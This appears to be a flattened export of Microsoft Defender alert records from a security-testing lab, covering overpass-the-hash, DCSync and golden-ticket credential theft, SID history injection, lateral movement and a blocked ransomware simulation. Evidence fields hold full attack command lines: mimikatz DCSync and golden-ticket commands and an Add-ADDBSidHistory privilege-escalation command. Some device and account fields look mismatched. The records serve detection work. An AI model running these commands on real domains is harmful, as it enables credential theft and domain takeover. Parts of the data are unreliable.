"verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:14:54.5333333Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:11:13.210308Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4064, "processCommandLine": "\"cmd.exe\" /c \"nslookup msdxv2-dc.msdxv2.m365dpoc.com\"", "processCreationTime": "2022-09-30T06:11:51.7062175Z", "processId": 10824, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9", "sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
aad5c5735b-8f7f-407f-acfd-2d706c7db616
d5c5735b-8f7f-407f-acfd-2d706c7db616
741
MicrosoftDefenderForIdentity
2022-11-18T05:12:07.4139838Z
2022-11-19T01:39:23.53Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:08:44.778634Z
2022-11-18T05:08:49.903208Z
Suspected overpass-the-hash attack (Kerberos)
Ron Henderson (Helpdesk Administrator) on MSDXV2-Win10V successfully authenticated against MSDXV2-DC.
DefenseEvasion
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
AzureATP
AbnormalKerberosOverpassTheHashSecurityAlert
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1550", "T1550.002" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } }, { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:12:07.6266667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072963592167272_591219755
a4dbf2a5-3be9-46c4-90ff-745a903bcea3
975
MicrosoftDefenderForEndpoint
2022-12-22T08:59:19.2167449Z
2022-12-22T08:59:20Z
null
2022-12-22T08:47:53.638129Z
2022-12-22T08:47:53.644205Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
New
High
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
null
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Low", "tags": [], "version": "1809", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:59:19.2433333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Url", "evidenceCreationTime": "2022-12-22T08:59:19.2433333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": "msdxv8-dc.msdxv8.m365dpoc.com", "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-12-22T08:59:19.2433333Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.10", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:59:19.2433333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 6324, "processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv8.m365dpoc.com /user:krbtgt\" exit", "processCreationTime": "2022-12-22T08:47:53.5760604Z", "processId": 6932, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T09:05:50.6533333Z
Suspicious
None
bob
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T04:51:48.8933333Z
Malicious
None
Takeshi
TMTOWER-BOOK
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:04:30.4666667Z
Suspicious
None
ronhd
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T20:37:53.13Z
Suspicious
None
operator
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:36:00.7266667Z
Suspicious
Active
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
5,168
powershell.exe -Command "Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \"S-1-5-32-544\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters).\"DSA Database file\""
2022-11-21T02:34:25.8338465Z
4,960
2022-11-21T02:34:15.4789089Z
cmd.exe
C:\Windows\System32
Detected
e138ecd8e7b21eaf952cb35d56349bf50c64ac96
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-28T10:19:27.3833333Z
Suspicious
None
bob
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:19:39.2166667Z
Suspicious
None
svc_acct
NT AUTHORITY
S-1-5-18
null
null
ed5324a2b10ad1342da6332982e4c8ec4c3cd096
fc4864065d84ccb4c855f4c47afa318113c1ba81e105c2ca0a8a33b51fe72299
ntoskrnl.exe
C:\Windows\System32
4
null
2022-11-11T08:13:24.9197363Z
null
null
null
null
Detected
36150b3c1b69b5c2da9df4efd86ac6c166924a48
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:19:35.2Z
5
None
alice
null
S-1-5-21-2300221942-1987151257-321556088-502
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-12T02:15:46.9933333Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T09:05:50.6533333Z
Suspicious
None
analyst
null
S-1-5-21-2300221942-1987151257-321556088-1104
null
null
21e48eb44f6d3aec36111c0e39819ab47761c1a5
f772c97ff2827eff3c27ed36a0054300c70ef110a714050e210b64e6d3931712
outlook.exe
7,076
"OUTLOOK.EXE"
2022-11-11T07:41:26.4391868Z
4,680
2022-11-10T07:07:26.0872385Z
null
null
null
null
da638045936787642009_1831391915
da638045936787642009_1831391915
765
MicrosoftDefenderForEndpoint
2022-11-21T02:14:38.7644213Z
2022-11-26T01:35:43.17Z
2022-11-26T01:35:43.0633333Z
2022-11-21T02:01:39.1809617Z
2022-11-21T02:01:39.1809617Z
Possible lateral movement
Lateral movement on another device was observed in close time proximity to a suspicious network event on this device. This could mean that an attacker is attempting to move laterally across devices to gather data or elevate privileges. This alert was triggered based on a Microsoft Defender for Endpoint alert.
LateralMovement
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
MTP
ab3e5834-3d38-42c5-aaa6-c1cfc6c02882
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1570", "T1021", "T1021.002", "T1021.003", "T1021.004", "T1021.006" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "None", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-21T02:14:38.81Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.5", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Url", "evidenceCreationTime": "2022-11-21T02:14:38.81Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": "msdxv2-win10b", "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638066012605013448_1322516070
e5926eaf-cd8b-4e72-9e35-ab7adeaba690
794
MicrosoftDefenderForEndpoint
2022-12-14T07:54:20.5013644Z
2022-12-14T08:00:01.6766667Z
null
2022-12-14T07:42:43.7957873Z
2022-12-14T07:42:43.7957873Z
'Locky' ransomware was prevented
Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.   To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.  This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
Ransomware
New
Medium
60
PendingApproval
null
null
WindowsDefenderAv
51d03c45-b142-4de4-95df-01b0c259d8f6
null
null
Locky
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Unknown", "deviceDnsName": "tmtower-win10b.tmtower.m365dpoc.com", "firstSeen": "2022-12-14T07:32:33.6902425Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "8d6414f0fc6bf2196d54aab4207d4a65873315c6", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Low", "tags": [], "version": "21H1", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Prevented", "deviceId": "8d6414f0fc6bf2196d54aab4207d4a65873315c6", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-14T07:54:20.5366667Z", "fileName": "TestFile_Block_Office_applications_from_creating_executable_content_3B576869-A4EC-4529-8536-B80A7769E899.docm", "filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating executable content", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": "File was created again after being remediated by antivirus", "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T15:56:02.45Z
Suspicious
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:28:43.7466667Z
Malicious
None
null
null
null
null
null
null
null
null
null
0
0001-01-01T00:00:00Z
0
0001-01-01T00:00:00Z
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:11:51.33Z
Suspicious
None
steve
corp.local
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045935057781645_-1319376665
d37ca336-64d0-434f-adbd-10633720781f
765
MicrosoftDefenderForEndpoint
2022-11-21T02:11:45.7781854Z
2022-11-21T02:22:37.63Z
2022-11-21T02:22:37.4745033Z
2022-11-21T02:07:28.8498674Z
2022-11-21T02:07:30.4523875Z
SID history injection
A Security IDentifcation (SID) history injection was detected on this device. SID history is an attribute that supports migration scenarios. Attackers typically use attack tools to change the SID history of an existing domain user to an SID with elevated privileges. With elevated privileges, the affected process might be able to access sensitive files, ensure persistence, and modify system settings.
PrivilegeEscalation
Resolved
Medium
51
Benign
null
null
WindowsDefenderAtp
f9448527-19db-4a4d-90e7-e9279c3e77b9
null
Barium
null
[ "T1134.005" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "evilcorp.cn", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "Defender", "domainName": "MSDXV2" } ], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } } ]
[ { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:11:45.81Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-21T02:11:45.81Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Clean" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:11:45.81Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:07:15.6313121Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 3020, "processCommandLine": "powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" ", "processCreationTime": "2022-11-21T02:07:28.5026314Z", "processId": 2504, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:13:00.48Z
Suspicious
None
user1
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:11:45.81Z
Suspicious
None
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1107
0808dea1-2ec8-41d2-8e3e-7c18309fab09
steve@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072957269391914_460423443
8e2d122c-81ac-4e3d-b833-ed3b945bae52
975
MicrosoftDefenderForEndpoint
2022-12-22T08:48:46.9392096Z
2022-12-22T08:48:47.5266667Z
null
2022-12-22T08:47:56.5126458Z
2022-12-22T08:47:56.5126458Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
New
High
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
null
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "prod.env", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Inactive", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV8" } ], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:48:46.97Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:48:46.97Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 6324, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv8.m365dpoc.com /sid:S-1-5-21-3093100532-1494214188-4059994775 /krbtgt:58c09f24a80803bb99a10fbe96570ebc /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit", "processCreationTime": "2022-12-22T08:47:53.8460182Z", "processId": 976, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:17:48.5166667Z
Suspicious
None
null
null
null
null
null
null
null
null
null
0
ping 127.0.0.1
0001-01-01T00:00:00Z
0
0001-01-01T00:00:00Z
null
null
null
null
da638045930235785637_-1560714689
6481deaa-0e5d-4035-a417-a8d15b86e3d0
765
MicrosoftDefenderForEndpoint
2022-11-21T02:03:43.5785844Z
2022-11-21T02:03:55.99Z
null
2022-11-21T01:57:48.8157309Z
2022-11-21T02:01:39.4913383Z
Suspicious System Network Configuration Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1016" ]
